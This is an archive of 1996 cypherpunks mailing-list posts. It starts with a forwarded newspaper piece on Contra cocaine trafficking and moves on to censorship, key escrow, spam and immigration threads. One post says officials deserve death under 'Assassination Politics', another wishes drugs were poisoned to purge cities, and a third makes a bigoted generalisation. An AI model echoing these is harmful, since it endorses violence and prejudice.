In that case, congressional records show, Senate investigators were trying to 
determine why the U.S. attorney in San Francisco, Joseph Russoniello, had given 
$36,000 back to a Nicaraguan cocaine dealer arrested by the FBI.

The money was returned, court records show, after two Contra leaders sent 
letters to the court swearing that the drug dealer had been given the cash to 
buy weapons for guerrillas. Russoniello said it was cheaper to give the money 
back than to disprove that claim.

``The Justice Department flipped out to prevent us from getting access to 
people, records -- finding anything out about it,'' recalled Jack Blum, former 
chief counsel to the Senate subcommittee that investigated allegations of Contra
 cocaine trafficking. ``It was one of the most frustrating exercises that I can 
ever recall.''

It wasn't until 1989, a few months after the Contra-Sandinista war ended and 
five years after Meneses moved from the Peninsula to a ranch in Costa Rica, that
 the U.S. government took action against him -- sort of.

Federal prosecutors in San Francisco charged Meneses with conspiracy to 
distribute one kilo of cocaine in 1984, a year in which he was working publicly 
with the FDN.

In S.F. photo, Meneses

seen with CIA operative

Meneses' work was so public, in fact, that he posed for a picture in June 1984 
in a kitchen of a San Francisco home with the FDN's political boss, Adolfo 
Calero, a longtime CIA operative who became the public face of the Contras in 
the United States.

According to the indictment, Meneses was in the midst of his alleged cocaine 
conspiracy at the time the picture was taken.

But the indictment was quickly locked away in the vaults of the San Francisco 
federal courthouse, where it remains today -- inexplicably secret for more than 
seven years. Meneses was never arrested.

Reporters found a copy of the secret indictment in Nicaragua, along with a 
federal arrest warrant issued Feb. 8, 1989. Records show the no-bail warrant was
 never entered into the national law enforcement database called NCIC, which 
police use to track down fugitives. The former federal prosecutor who indicted 
him, Eric Swenson, declined to be interviewed.

After Nicaraguan police arrested Meneses on cocaine charges in Managua in 1991, 
his judge expressed astonishment that the infamous smuggler went unmolested by 
American drug agents during his years in the United States.

``How do you explain the fact that Norwin Meneses, implicated since 1974 in the 
trafficking of drugs . . . has not been detained in the United States, a country
 in which he has lived, entered and departed many times since 1974?'' Judge 
Martha Quezada asked during a pretrial hearing.

``Well, that question needs to be asked to the authorities of the United 
States,'' replied Roger Mayorga, then chief of Nicaragua's anti-drug agency.

U.S. officials amazed

Meneses remained free

His seeming invulnerability amazed American authorities as well.

A Customs agent who investigated Meneses in 1980 before transferring elsewhere 
said he was reassigned to San Francisco seven years later ``and I was sitting in
 some meetings and here's Meneses' name again. And I can remember thinking, 
`Holy cow, is this guy still around?' ''

Blandon led an equally charmed life. For at least five years he brokered massive
 amounts of cocaine to the black gangs of Los Angeles without being arrested. 
But his luck changed overnight.

On Oct. 27, 1986, agents from the FBI, the IRS, local police and the Los Angeles
 County sheriff fanned out across Southern California and raided more than a 
dozen locations connected to Blandon's cocaine operation. Blandon and his wife, 
along with numerous Nicaraguan associates, were arrested on drug and weapons 
charges.

The search warrant affidavit reveals that local drug agents knew plenty about 
Blandon's involvement with cocaine and the CIA's army nearly 10 years ago.

``Danilo Blandon is in charge of a sophisticated cocaine smuggling and 
distribution organization operating in Southern California,'' L.A. County 
sheriff's Sgt. Tom Gordon said in the 1986 affidavit. ``The monies gained from 
the sales of cocaine are transported to Florida and laundered through Orlando 
Murillo, who is a high-ranking officer of a chain of banks in Florida named 
Government Securities Corporation. From this bank the monies are filtered to the
 Contra rebels to buy arms in the war in Nicaragua.''

Corporate records show that Murillo -- a Nicaraguan banker and relative of 
Blandon's wife -- was a vice-president of Government Securities Corporation in 
Coral Gables, a large brokerage firm that collapsed in 1987 amid allegations of 
fraud. Murillo did not respond to an interview request.

Despite their intimate knowledge of Blandon's operations, the police raids were 
a spectacular failure. Every location had been cleaned of anything remotely 
incriminating. No one was ever prosecuted.

Ron Spear, a spokesman for Los Angeles County Sheriff Sherman Block, said 
Blandon somehow knew that he was under police surveillance. Others thought so, 
too.

``The cops always believed that investigation had been compromised by the CIA,''
 Los Angeles federal public defender Barbara O'Connor said in a recent 
interview. O'Connor knew of the raids because she later defended the raids' 
leader, Sgt. Gordon, against federal charges of police corruption. Gordon, 
convicted of tax evasion, declined to be interviewed.

Lawyer suggests aid

was at root of problem

FBI records show that soon after the raids, Blandon's defense attorney, Bradley 
Brunon, called the sheriff's department to suggest that his client's troubles 
stemmed from a most unlikely source: a recent congressional vote authorizing 
$100 million in military aid to the CIA's Contra army.

According to a December 1986 FBI Teletype, Brunon told the officers that the 
``CIA winked at this sort of thing. . . . (Brunon) indicated that now that U.S. 
Congress had voted funds for the Nicaraguan Contra movement, U.S. government now
 appears to be turning against organizations like this.''

That FBI report, part of the files of former Iran-Contra Special Prosecutor 
Lawrence Walsh, was made public only last year, when it was released by the 
National Archives at the Mercury News' request.

Blandon has also implied that his cocaine sales were, for a time, CIA-approved. 
He told a San Francisco federal grand jury in 1994 that once the FDN began 
receiving American taxpayer dollars, the CIA no longer needed his kind of help.

``When Mr. Reagan get in the power, we start receiving a lot of money,'' Blandon
 testified. ``And the people that was in charge, it was the CIA, so they didn't 
want to raise any (drug) money because they have, they had the money that they 
wanted.''

``From the government?'' asked Assistant U.S. Attorney David Hall.

``Yes, for the Contra revolution,'' Blandon said. ``So we started -- you know, 
the ambitious person -- we started doing business by ourselves.''

Asked about that, prosecutor Hall said, ``I don't know what to tell you. The CIA
 won't tell me anything.''

None of the government agencies known to have been involved with Meneses and 
Blandon over the years would provide the Mercury News with any information about
 them.

A Freedom of Information Act request filed with the CIA was denied on national 
security grounds. FOIA requests filed with the DEA were denied on privacy 
grounds. Requests filed months ago with the FBI, the State Department and the 
Immigration and Naturalization Service have produced nothing so far.

None of the DEA officials known to have worked with the two men would talk to a 
reporter. Questions submitted to the DEA's public affairs office in Washington 
were never answered, despite repeated requests.

Blandon's lawyer, Brunon, said in an interview that his client never told him 
directly that he was selling cocaine for the CIA, but the prominent Los Angeles 
defense attorney drew his own conclusions from the ``atmosphere of CIA and 
clandestine activities'' that surrounded Blandon and his Nicaraguan friends.

``Was he involved with the CIA? Probably. Was he involved with drugs? Most 
definitely,'' Brunon said. ``Were those two things involved with each other? 
They've never said that, obviously. They've never admitted that. But I don't 
know where these guys get these big aircraft . . .''

That very topic arose during the sensational 1992 cocaine trafficking trial of 
Meneses after Meneses was arrested in Nicaragua in connection with a staggering 
750-kilo shipment of cocaine. His chief accuser was his friend Enrique Miranda, 
a relative and former Nicaraguan military intelligence officer who had been 
Meneses' emissary to the cocaine cartel of Bogota, Colombia. Miranda pleaded 
guilty to drug charges and agreed to cooperate in exchange for a seven-year 
sentence.

In a long, handwritten statement he read to Meneses' jury, Miranda revealed the 
deepest secrets of the Meneses drug ring, earning his old boss a 30-year prison 
sentence in the process.

``He (Norwin) and his brother Luis Enrique had financed the Contra revolution 
with the benefits of the cocaine they sold,'' Miranda wrote. ``This operation, 
as Norwin told me, was executed with the collaboration of high-ranking 
Salvadoran military personnel. They met with officials of the Salvadoran air 
force, who flew (planes) to Colombia and then left for the U.S., bound for an 
Air Force base in Texas, as he told me.''

Meneses -- who has close personal and business ties to a Salvadoran air force 
commander and former CIA agent named Marcos Aguado -- declined to discuss 
Miranda's statements during an interview at a prison outside Managua in January.
 He is scheduled to be paroled this summer, after nearly five years in custody.

U.S. General Accounting Office records confirm that El Salvador's air force was 
supplying the CIA's Nicaraguan guerrillas with aircraft and flight support 
services throughout the mid-1980s.

Miranda did not name the Air Force base in Texas where the FDN's cocaine was 
purportedly flown. The same day the Mercury News requested official permission 
to interview Miranda, he disappeared.

While out on a routine weekend furlough, Miranda failed to return to the 
Nicaraguan jail where he'd been living since 1992. Though his jailers, who 
described him as a model prisoner, claimed Miranda had escaped, they didn't call
 the police until a Mercury News correspondent showed up and discovered he was 
gone.

He has not been seen in nearly a year.

Additional reporting for this series in Nicaragua and Costa Rica was done by 
Managua journalist Georg Hodel. Research assistance at the Nicaraguan Supreme 
Court in Managua was done by journalist Leonore Delgado.


This material is copyrighted and may not be republished without permission of 
the originating newspaper or wire service. NewsHound is a service of the San 
Jose Mercury News. For more information call 1-888-344-6863.



-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 21 Aug 1996 09:35:47 +0800
To: cypherpunks@toad.com
Subject: Re: Pappieren, bitte! (and Taxes, National Debt)
Message-ID: <199608202257.PAA24418@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:18 PM 8/20/96 -0700, Timothy C. May wrote:

>One estimate I have seen places the overall national debt, counting
>obligations and promised payments, at $20 trillion, or four times the
>official number. And it is still increasing every year. To see how large
>this is, there are 100 million taxpayers in the U.S., roughly. This means
>each of these taxpayers has an average indebtedness of $200,000. Most
>American households do not have this amount of money in total net worth,
>obviously. Thus, they "owe" much more than they are worth.
>
>Obviously enough, the portion of this debt is not distributed uniformly
>amongst households, or won't be if it is ever collected. But you get the
>drift. The country has been spending far more than it has been taking in
>for many years, and is far worse shape than "official" figures about the
>National Debt would tend to suggest.
>
>Neither Dole nor Clinton appear to want to talk about this, both having
>done their parts to make the situation what it is today.

This is exactly why I'm astonished when a few people occasionally (and, 
prematurely) reject my "Assassination Politics" idea.  If the problem is as 
big as all that (and it is!) then these people are well and truly guilty of 
way more than enough crimes to merit their deaths.  

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 21 Aug 1996 07:09:59 +0800
To: "Erik E. Fair" <fair@cesium.clock.org>
Subject: Re: Securing Internet mail at the MTA level
In-Reply-To: <v02140b24ae3fa8d7849e@[17.255.9.110]>
Message-ID: <Pine.SUN.3.91.960820155556.10216C@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


you really need both object and transport level security; the transport 
level stuff helps protect against traffic analysis; the real 
authentication and privacy coming from the object level stuff.

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Wed, 21 Aug 1996 07:52:08 +0800
To: cypherpunks@toad.com
Subject: lambda 2.10 (fwd) -- (ie -- French Consitution censors net)
Message-ID: <Pine.BSI.3.91.960820160511.24736C-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Just passing this on in case it strikes anyone's interest :)

---------- Forwarded message ----------
Date: Mon, 19 Aug 1996 20:10:02 +0100
From: Jerome Thorel <jt@freenix.fr>
To: thorel@netpress.fr
Subject: lambda 2.10

netizen's --> Lambda Bulletin 2.10 <-- contents
flash bulletin

+ French Constitution censors Internet control
+ Singapore and the Censorship Proxy Server
+ G7 and the EC take strong steps for Key Escrow Encryption


*               *               *               *               *


French Constitution censors Internet control

As we speculated in our last bulletin (2.09), the French Conseil
Constitutionnel, watchdog of the 1958 Constitution, censored 2 articles in
a new telecom act which were intended to establish a kind of administrative
control over Internet speech and online services.

The nine "Sages" said that the creation of the Conseil Superieur de la
Telematique, which would have make guidelines on Internet content, breaches
article 34 of the Constitution which states that the Parliament can act
alone to dictate rules concerning "civic rights and fundamentals garanties
given to citizens for a fair exercice of public liberties". The CST could
have undermine these principles, because the law didn't specify clearly how
it would have taken its decisions. So the Conseil recognized the particular
state of the Internet, which is not a basic medium.

Only one section remains in the censored law : it obliges ISPs to give
their clients "technical means" to forbid or select access to online
services, software that allows a so-called "parental control".

*               *               *               *               *

Singapore and the Censorship Proxy Server

A communique from SingNet, Singapore's main Internet Service Provider,
states that "ALL SingNet customers will be required to connect to SingNet's
proxy server by the deadline September 14th 1996, failing which you would
not be able to access the web without the proxy. This applies to all
dial-up, ISDN, and leased line customers (STIX customers are exempted). "

The proxy server will ease the ISP to "Deny access to blacklisted sites
supplied by SBA". SingNet said that "Access to sites banned by the SBA will
prompt the message :
The site you requested is not accessible
For more information on Singapore's Internet regulation, please check
http://www.gov.sg/sba/netreg/regrel.htm".

On July 11 the Singapore government passed the Singapore Broadcasting
Authority Act (Chapter 297) in which it announced a "Class Licence Scheme"
aimed "to encourage responsible use of the Internet while facilitating its
healthy development in Singapore. It encourages minimum standards in
cyberspace and seeks to protect Net users, particularly the young, against
the broadcast of unlawful or objectionable materials. ... SBA will focus on
content which may undermine public morals, political stability and
religious harmony of Singapore. However, SBA recognises that it is
impossible to regulate the Internet fully. ... Singaporeans can help SBA in
the identification of objectionable sites in order to keep cyberspace
clean. SBA welcomes public feedback on objectionable content found on the
Internet. Members of the public can write to SBA, call its toll-free
hotline ... or post their views on the SBA homepage at
http://www.gov.sg/sba. "

China, which has created its own Internet regulations aimed at controlic
data traffic and urged netizens to declare themselves to the authorities,
approved the Singapore Act and an official was quoted as saying, "China has
a lot to learn from Singapore's experience" (source : Fight-censorship
mailing list).

*               *               *               *               *

G7 and the EC take strong steps for Key Escrow Encryption

The European Commission's DG-13 division on information security (Infosec)
opened on July 30th a "call for tenders" for "preparatory works" towards
regulating encryption procedures. The plan is aimed to test the
introduction of the Europe-wide network of Trusted Third Party Services
(ETS).

Observers saw in this move the so-called "guidelines" the EC was to propose
last year, when press reports (Nature, Sept. 28, 1995) argued the
Commission and the Council of Europe in Strasbourg were willing to regulate
encryption use through the creation of TTPs.

The Infosec call for tenders, which will end by September 30, is to
"identify, define and verify ... operationnal, technical, regulatory and
legal aspects ... to assess the effectiveness, economics and acceptability
of Trusted Third Party Services."

Other voices in European talks, however, said these "preparatory works" are
to push for EU countries to adopt TTPs and the principles of key-escrow
encryption. Nordic countries such as Finland, Denmark and Sweden, are said
to be opposed to change encryption legislation, as France and Britain took
steps in June and July to enforce the creation of TTPs in their own
country.

On July 30 G7 countries agreed policies that would "accelerate
consultations on encryption that allows, when necessary, lawful government
access to data and communications in order to prevent or investigate acts
of terrorism, while protecting the privacy of legitimate communications".
The EPIC, in Washington, DC, said "stronger measures sought by the US to
restrict information on the Internet and limit the availabilioty of
encryption were apparently not adopted by the G7 countries". Among other
industrialised nations, Japan and Australia are said, like Nordic countries
in Europe, to oppose key escrow as a mean to regulate the free flow of
information. Remember the OECD talks in June, were the US tried to impose
key-escrow legislation to the 27-countries' club of the industrial world
(see lambda 2.09)

*****
Soon archived on www.freenix.fr/netizen

-----
Jerome Thorel =-= Journaliste/Free-lance Reporter =-= Paris, France
   =+= the lambda bulletin --> http://www.freenix.fr/netizen =+=








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Wed, 21 Aug 1996 11:26:15 +0800
To: vipul@pobox.com
Subject: Re: Spamming (Good or Bad?)
Message-ID: <199608202313.QAA00726@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 21 Aug 96, 4:07, Vipul Ved Prakash wrote:

> I don't know if there has been much discussion on the ethics of
> spamming here? Is spamming free speech? 
> 
> - Vipul


The way I see it:  if you narrow your targeting, by research, you can 
send SPAM to people who may really have a need for your products and 
services.  I send spam.  I am very apologetic, but I send only to 
software manufacturers.  I sell software media and duplication, so 
most software makers can relate to a request for me to quote on their 
needs.  BUT I OBJECT to spamming of usenet, and my mailing lists that 
I read.

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 21 Aug 1996 12:20:31 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <199608210407.EAA00568@fountainhead.net>
Message-ID: <199608202323.QAA21334@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Vipul Ved Prakash <vipul@pobox.com> writes:
>I don't know if there has been much discussion on the ethics of spamming
>here? Is spamming free speech? 

Your right to speak freely is protected in the US.  Your right to blare
simultaneously with a megaphone at every on-line crowd in the world is
not.  I know of no laws prohibiting your spamming, and I know of no laws
that would prevent someone from interfering with your spamming.  It's a
vigilante world... this year.

I oppose spamming because it's rude and inefficient, lowering the S/N
everywhere it happens.  Market droids favor it because it's cheap, and
no matter how many people they piss off bigtime, they make some sales.
People who oppose spam should do what they can to make it less
cost-effective... within legal limits, I suppose.

Perhaps the cypherpunk relevance is that next generation Usenet and
mailing lists could require the moderator's digital signature before
propagation happens... but I'd prefer to see an unexpected upwelling
of politeness.

	Jim Gillogly
	28 Wedmath S.R. 1996, 23:11




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Wed, 21 Aug 1996 09:38:03 +0800
To: Scottauge@aol.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <199608202321.QAA00971@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 20 Aug 96, 18:36, Scottauge@aol.com wrote:

> Rush Limbaugh reports:

Well, if Rush was a reporter this might have some meaning.

> 
> That a husband and wife are being jailed for yelling to Clinton "You
> Suck".

How long were they in jail?  And many other questions come to mind.

> 
> The Secret Service states additional words (yet un-uttered to the
> rest of us) were mentioned that they deemed threatening.

I'd wonder about that.

> 
> Ahhh, good to live in a free country....
> 

This is as free as it gets these days.

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 21 Aug 1996 11:59:17 +0800
To: cypherpunks@toad.com
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <Pine.SV4.3.91.960820191108.9214E-100000@larry.infi.net>
Message-ID: <Pine.GUL.3.95.960820161914.11228A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Alan Horowitz wrote:

> I wish they'd get back in the business, but add an overt poison to the 
> product.
> 
> Clean out the shit from the cities. Long live Darwinism.

Actually, I'd say that's closer to Lamarckism. The rich get richer, and the
poor get poorer, by the accumulation and inheritance of acquired rather than
innate goods.

If we were thrown back to a natural Darwinian world, I doubt many of us
would last long. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Wed, 21 Aug 1996 13:39:51 +0800
To: DMiskell@envirolink.org
Subject: Re: your mail
Message-ID: <199608202137.QAA14069@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: DMiskell@envirolink.org, cypherpunks@toad.com
Date: Tue Aug 20 16:41:01 1996
> So, how do you UNDO the encryptation?  Gee, no wonder it's uncrackable.
> 
> Daniel.
> 
> 
> 

It may very well be the ultimate one-way hash.

dave


- ---- David E. Smith  POB 324  Cape Girardeau MO USA 63702
dsmith@prairienet.org   http://www.prairienet.org/~dsmith
send mail of 'send pgp-key' subject for my PGP public key
"Reality is the original Rorshach" -- Principia Discordia
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automagically signed with Pronto Secure for Windows.

iQEVAwUBMhow8DVTwUKWHSsJAQFm+wf+I7+0gcjYxrD0du/1I6Ufz/0jctIA6xJt
8ePhjW6X6rIzGPshzGapQ4dOpUZTa+dtsnvUccg7Fn4sBv71lELnGobNMvnSImzA
C7OT+25giz3XGsfKTX6M0EruV4EkwfutBGp129FuU6blXNnXpFTtvy0q4PbGqE0B
mti6n5/JQw2I3GVP72duvPKZ9Fac34Hr7e8OA1YYBLgTa0vIAl4F98x2O6CNjhfF
Y+/qbzZov1ltl2QggfPc2juxWvTV4trW8tLOi5TddiS/avHOHoMebe2FjAu6MATt
giO+HDT+AIvE4NZ+EZAct6VCz8HIkhRfJmgJBK9wQkwOvRkV4ZqnPQ==
=uVag
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@issl.atl.hp.com>
Date: Wed, 21 Aug 1996 09:27:19 +0800
To: cypherpunks@toad.com (Cypherpunks List)
Subject: Re: Hackers invade DOJ web site
In-Reply-To: <1.5.4.16.19960820135236.0ca75906@pop.mhv.net>
Message-ID: <199608202041.QAA13905@jafar.issl.atl.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


Lynne L. Harrison writes:
> 
> At 07:08 PM 8/19/96 -0500, Igor Chudov wrote:
> >
> >I personally find the web page very well and artistically done, and
> >extremely funny. The guy who did it had a good taste.
> 
>   I personally found the page to be offensive and disagree highly with the
> person having "good taste".
>   Following the premise that another posted to this list, there were ways of
> focusing on opposing the CDA without insulting women and/or minorities.  I
> also agree that this act is going to backfire by giving the DOJ fodder when
> the case reaches the Supreme Court.
>   IMO, it was patently obvious that it was a kid or kids that did it who
> gave no substantial thought on the consequences of his/their act.

While I wouldn't say that the site was exactly "in good taste", there
was nothing there that was offensive to me.  And I don't really see why
anything there should have offended women (the mere sight of female
genitalia, presumably, is offensive to women?  One wonders how women ever
manage to get dressed in the morning without keeling over from self-induced
mortification?  Or is it hillaryshair.com that is offensive to women?),
or minorities (simply because Hitler's name and picture were displayed,
I guess?).

Besides, I've seen no evidence that the page was actually created by
an Evil Hacker who broke in; how do we know it wasn't just a low-level
DoJ sysadmin following orders?  After all, if the reaction you fear
from the Supremes is so likely, why couldn't a pro-CDA staffer simply
supply ready-made fodder.

The web page is pure satire and not poorly done, IMO, at least from a
political viewpoint.  If this sort of display would be banned by the
CDA, then I'd say we are all quite right to fear it  This is exactly
the kind of "speech" that the CDA must *not* be allowed to ban.

The bottom line for the DoJ is that this merely proves the need for
better security on their web site (if indeed it *was* a breakin by an
Evil Hacker, of course).


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Wed, 21 Aug 1996 13:56:37 +0800
To: cypherpunks@toad.com
Subject: Re: Pappieren, bitte! (and Taxes, National Debt)
In-Reply-To: <ae3f5aed030210049231@[205.199.118.202]>
Message-ID: <9608201647.ZM3539@glacius.tor.aw.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


On Aug 20, 12:18pm, Timothy C. May wrote:
> At 5:38 PM 8/20/96, Stephen Cobb wrote:
> >Very true...what I am saying is that, as far as my reading goes, LEGAL
> >aliens are going to be required to pay social security "taxes" while not
> >having any "entitlement" in return. They pay income taxes and get certain
> >things, like law and order, in return. They will be paying soc sec money to
> >the government without getting anything in return.
> I think the "no driver's licenses to illegal aliens" makes a certain kind
> of sense, though. (Not that I don't have some compassion for them, being an
> open borders advocate.) If the State gives official documents to illegal
> aliens, what's the point of their being classified as illegal aliens?

Erm. Tim seems to be writing about how it doesn't make much sense to give
driver's licenses to illegal aliens and Stephen is writing about how Arizona
is planning to not give driver's licenses to legal aliens. Which would
appear to be talking at crosspurposes.

I'm a PLRA in the USA, so it does matter somewhat to me that i might be unable
to get a driver's license in a country i could legally reside in because i'm
not a citizen of that country. Especially if that country won't let me drive
for extended periods of time on a driver's license issued elsewhere.

If the State won't give me official documents (as a legal alien), what's the
point of being classified as a legal alien? (Except more exciting
interrogations every time i cross the border?)

Tim's opinions on illegal immigrants, good, but don't really apply so much
to PLRAs (who cannot vote, but can pay taxes and be drafted). [Which is,
i think, what Stephen was writing about in the first place.]

richard

-- 
Richard Martin                                   [not speaking for a|w]
rmartin@aw.sgi.com                   http://reality.sgi.com/rmartin_aw/
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
 NOTE: My email address as of August 23 1996 is g4frodo@cdf.utoronto.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Wed, 21 Aug 1996 03:00:54 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Naked woman decrapitates man on Internet!!!
Message-ID: <9608201457.AA17813@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Aug 20 16:55:54 1996
> Seven billion (thousand million for you Brits) people in the world.
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Actually everybody uses billion as 10^12 (except Americans -> 10^9).

;-) America is getting more and more of an island... ;-)

- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMhnR+xFhy5sz+bTpAQFAvggAwnWNgUTs0vpnwtK34AJjictQlLOZrhYl
ANY8xoZ3cLKlcLZmLIo2m+N9QOrO9Bdp4Q1op1KTa9BUUDH0vl5rZak5C/L/+TKw
EDp2N143ANWGrz5xd3BgFd/ly8VEPwVGQc85yjW6noRIl+5GUHaYKtNPGzr0V6oU
d83igcL3/zU9GGwT6l1r7o/U/+cjy6Poui2IZYlVqy564kE2s71ztlVH687ZAHaF
ZTRdkLZqi56AjI1g684zKik0qQ98SdQpHqz1CpzT6BuDS954bk3gip95Znu4PtYu
vSEDTsTNf05jNqpjDHTLtPSSELgjNmA07Sb8PLlqJOWLcWVmYQP3Eg==
=8mhr
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Skip)
Date: Wed, 21 Aug 1996 12:51:23 +0800
To: stephen@iu.net (Stephen Cobb)
Subject: Re: AZ DMV: Citizenship to Drive? (fwd)
In-Reply-To: <1.5.4.32.19960820172648.00cf4364@iu.net>
Message-ID: <199608210002.RAA09034@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ON
> 
> At 07:37 AM 8/20/96 -0400, you wrote:
> >Your papers, please?
> >
> >---------- Forwarded message ----------
> >Date: Mon, 19 Aug 1996 21:04:07 -0700 (PDT)
> >From: Bob Witanek <bwitanek@igc.apc.org>
> >To: Recipients of pol-abuse <pol-abuse@igc.apc.org>
> >Subject: AZ DMV: Citizenship to Drive?
> >
> >Posted: gdiazj@IMAP1.ASU.EDU
> >
> >Today the Arizona Department of Motor Vehicles began requiring
> >proof of citizenship before issuing a drivers license or a state
> >identification. This policy was established by HB 2154 which passed
> >this last session (this one slipped passed me).
> >
> >I am helping organize people in Arizona to oppose this.  Please
> >send your information ASAP, we need you your help.
> >
> >VIVA LA RAZA
> >George Diaz, Jr.
> >gdiazj@imap1.asu.edu
> >GDIAZJ@aol.com
> >gdiaz@ci.phoenix.az.us
> >
> Not quite sure what this has to do with crypto, but here goes:
> 
> As with the recent federal legislation denying soc sec benefits to LEGAL
> aliens who are required by law to pay into the system and can by law be
> required to serve in the US armed forces, this appears to my untrained eye
> to be yet another case of isolationist paranoia...I am sure this one
> violates international agreements that the US has made concerning reciprocal
> accodomations as far as driving is concerned.
> 
> I used to be a tax-paying soc sec paying legal alien, but I got so fed up
> with head-in-the-dirt hicks who thought you had to be a citizen to breathe
> the prairie dust that I became a citizen for an easier life (and I mean some
> of these ignorant fools were sons of immigrants who voted agianst the US
> fighting Hitler!!!!). 
> 
> Because I still talk with something of a foreign accent I still get
> uneducated idiots, who couldn't pass the test they make foreigners take,
> lecturing me on what I cannot do because I am a foreigner. The only thing I
> can't do is run for President. 
> 
> I despair of backwater state legislators, I really do. What to do about this
> particular problem? Check out the rules on International drivers licenses. I
> know can drive on them for a year...If you are not allowed a drivers license
> because you are an alien, maybe you don't need their stinking licenses.

Absolutely correct, America is extremely hostile to anyone who isn't an 
impoverished white, ie, a redneck.  You be sure and tell all your friends
that, especially your African and Asian friends, advising them to stay 
away from the devil's continent as if their life depends on it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 21 Aug 1996 12:15:41 +0800
To: cypherpunks@toad.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <ae3fa332050210048d05@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:36 PM 8/20/96, Scottauge@aol.com wrote:
>Rush Limbaugh reports:
>
>That a husband and wife are being jailed for yelling to Clinton "You Suck".
>
>The Secret Service states additional words (yet un-uttered to the rest of us)
>were mentioned that they deemed threatening.
>
>Ahhh, good to live in a free country....

Ironically, at a recent Clinton rally the "person of poundage" comedienne
Rosie O'Donnell led a "Dole Sucks!" cheer. (This was reported in the news
because it apparently was an embarassment to the Clintons.)

A double standard?

Or is the crime the insulting of the monarch?

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Skip)
Date: Wed, 21 Aug 1996 14:26:11 +0800
To: rich@c2.org
